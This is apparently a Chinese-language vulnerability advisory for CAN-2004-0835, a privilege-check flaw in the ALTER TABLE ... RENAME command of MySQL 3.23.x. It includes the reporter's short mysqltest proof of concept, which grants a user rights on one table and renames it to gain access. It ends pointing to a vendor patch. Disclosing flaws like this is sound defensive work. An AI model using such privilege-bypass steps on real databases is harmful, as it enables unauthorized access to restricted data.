受影响系统:
MySQL AB MySQL 3.23.x
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2004-0835
MySQL是一款开放源代码数据库系统。
MySQL的对alter table [...] rename [...]命令没有正确检查目标表的权限,远程攻击者可以利用这个漏洞访问受限制表单。
Oleksandr Byelkin在5月份报告alter table [...] rename [...]命令可以使用旧表代替新表来检查的建立/插入权限,结果可导致用户访问其他受限制的表单。
<*来源:Oleksandr Byelkin
链接:http://bugs.mysql.com/bug.php?id=3270
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Oleksandr Byelkin 提供了如下测试方法:
drop database if exists mysqltest;
connect (root,localhost,root,,test,0,mysql-master.sock);
connection root;
--disable_warnings
create database if not exists mysqltest;
--enable_warnings
create table mysqltest.t1 (a int,b int,c int);
grant all on mysqltest.t1 to mysqltest_1@localhost;
connect (user1,localhost,mysqltest_1,,mysqltest,0,mysql-master.sock);
connection user1;
alter table t1 rename t2;
建议:
--------------------------------------------------------------------------------
厂商补丁:
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: